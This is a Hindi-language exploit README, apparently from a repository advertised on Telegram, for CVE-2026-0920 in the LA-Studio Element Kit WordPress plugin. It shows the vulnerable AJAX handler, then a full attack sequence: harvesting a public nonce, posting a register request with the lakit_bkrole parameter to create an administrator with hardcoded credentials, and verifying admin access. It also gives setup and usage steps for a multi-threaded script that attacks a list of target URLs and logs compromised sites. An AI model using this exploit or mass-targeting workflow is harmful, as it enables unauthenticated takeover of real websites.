
LA-Studio Element Kit for Elementor <= 1.5.6.3 - lakit_bkrole पैरामीटर के माध्यम से बैकडोर द्वारा प्रशासनिक उपयोगकर्ता निर्माण हेतु बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
LA-Studio Element Kit for Elementor <= 1.5.6.3 - lakit_bkrole पैरामीटर के माध्यम से प्रशासनिक उपयोगकर्ता निर्माण हेतु बैकडोर द्वारा बिना प्रमाणीकरण के विशेषाधिकार वृद्धि
_____ _____ ___ __ ___ __ __ ___ ___ __
/ __\ \ / / __|_|_ ) \_ )/ / ___ / \/ _ \_ ) \
| (__ \ V /| _|___/ / / () / // _ \___| () \_, // / () |
\___| \_/ |___| /___\__/___\___/ \__/ /_//___\__/
📡 एक्सप्लॉइट सबसे पहले यहीं जारी होता है। टेलीग्राम पर @KNxploited को फॉलो करें — नए खुलासा हुए CVE, कार्यशील PoC और सटीक सुरक्षा अनुसंधान के लिए आपका विशेष फ़ीड। लगातार अपडेट। उनके लिए बनाया गया है जो आगे रहते हैं।
CVE-2026-0920 एक CVSS 9.8 क्रिटिकल भेद्यता है जो LA-Studio Element Kit for Elementor WordPress प्लगइन में खोजी गई है।
यह दोष ajax_register_handle() फ़ंक्शन में स्थित है, जो AJAX के माध्यम से बिना प्रमाणीकरण के उपयोगकर्ता पंजीकरण को संसाधित करता है। यह फ़ंक्शन lakit_bkrole पैरामीटर पर किसी भी प्रतिबंध को लागू करने में विफल रहता है — जिससे पूरी तरह से बिना प्रमाणीकरण वाला हमलावर पंजीकरण के दौरान administrator भूमिका स्वयं-निर्धारित कर सकता है, और एक ही अनुरोध में पूर्ण WordPress एडमिन अधिग्रहण प्राप्त कर सकता है।
| फ़ील्ड | विवरण |
|---|---|
| CVE ID | CVE-2026-0920 |
| प्लगइन | LA-Studio Element Kit for Elementor |
| स्लग | lakit / la-studio-element-kit-for-elementor |
| प्रभावित संस्करण | 1.5.6.3 तक के सभी संस्करण |
| भेद्यता प्रकार | बिना प्रमाणीकरण के विशेषाधिकार वृद्धि / एडमिन निर्माण |
| हमला वेक्टर | नेटवर्क — कोई प्रमाणीकरण आवश्यक नहीं |
| CVSS 3.1 स्कोर | 9.8 क्रिटिकल |
| CVSS वेक्टर | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| प्रभाव | पूर्ण WordPress प्रशासक अधिग्रहण |
| शोधकर्ता | Nxploited |
मूल कारण प्लगइन के AJAX पंजीकरण हैंडलर में भूमिका क्षमता जांच की कमी है:
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);
public function ajax_register_handle() {
$actions = json_decode(stripslashes($_POST['actions']), true);
foreach ($actions as $req) {
if ($req['action'] === 'register') {
$data = $req['data'];
$user_data = [
'user_login' => $data['username'],
'user_pass' => $data['password'],
'user_email' => $data['email'],
'role' => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
];
// No validation of $data['lakit_bkrole'] against allowed roles
wp_insert_user($user_data); // Administrator created silently
}
}
}
यह क्रिटिकल क्यों है:
wp_ajax_nopriv_* = बिना किसी प्रमाणीकरण के किसी भी व्यक्ति के लिए सुलभlakit_bkrole किसी भी WordPress भूमिका स्ट्रिंग को स्वीकार करता है — जिसमें administrator भी शामिल हैStep 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)
Search HTML/JS for:
"ajaxNonce": "<value>" ← Inline JSON config
ajaxNonce: '<value>' ← JS variable
data-ajaxnonce="<value>" ← HTML attribute
Nonce is publicly accessible — no login required.
↓
ajaxNonce extracted ✔️
──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = lakit_ajax
_nonce = <extracted nonce>
actions = {
"req1": {
"action": "register",
"data": {
"email": "[email protected]",
"password": "adminSA",
"username": "Nx_admin",
"lakit_field_log": "yes", ← use supplied username
"lakit_field_pwd": "yes", ← use supplied password
"lakit_field_cpwd": "no", ← skip password confirm
"lakit_bkrole": "1", ← trigger admin role injection
"lakit_recaptcha_response": ""
}
}
}
↓
Administrator account silently created ✔️
──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
log = Nx_admin
pwd = adminSA
↓
Session cookies obtained → GET /wp-admin/plugin-install.php
↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
pip install requests colorama
| निर्भरता | उद्देश्य |
|---|---|
requests | HTTP अनुरोध, सत्र प्रबंधन, कुकी प्रबंधन |
colorama | सभी प्लेटफॉर्मों पर रंगीन टर्मिनल आउटपुट |
threading | समवर्ती मल्टी-टार्गेट प्रोसेसिंग |
re | HTML/JS से रेगेक्स-आधारित nonce निष्कर्षण |
Python 3.10+ अनुशंसित (
str | Noneयूनियन टाइप हिंट का उपयोग करता है)।
CVE-2026-0920/
├── CVE-2026-0920.py # Main exploit script
├── list.txt # Target URLs — one per line
├── success_results.txt # Auto-generated: pwned targets + credentials
CVE-2026-0920.py खोलें और अपने इच्छित एडमिन खाता विवरण सेट करने के लिए शीर्ष पर मौजूद कॉन्स्टेंट संपादित करें:
ADMIN_EMAIL = "[email protected]" # Email for the new admin account
ADMIN_PASSWORD = "adminSA" # Password for the new admin account
ADMIN_USERNAME = "Nx_admin" # Username for the new admin account
प्रत्येक पंक्ति में एक टार्गेट URL के साथ list.txt बनाएं:
https://target1.com
https://target2.com
http://target3.com
बिना स्कीम वाले URLs को स्वचालित रूप से
https://उपसर्ग दिया जाता है।
python CVE-2026-0920.py
आपको संकेत दिया जाएगा:
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50): 20
स्क्रिप्ट रीयल-टाइम, रंग-कोडित टर्मिनल आउटपुट उत्पन्न करती है: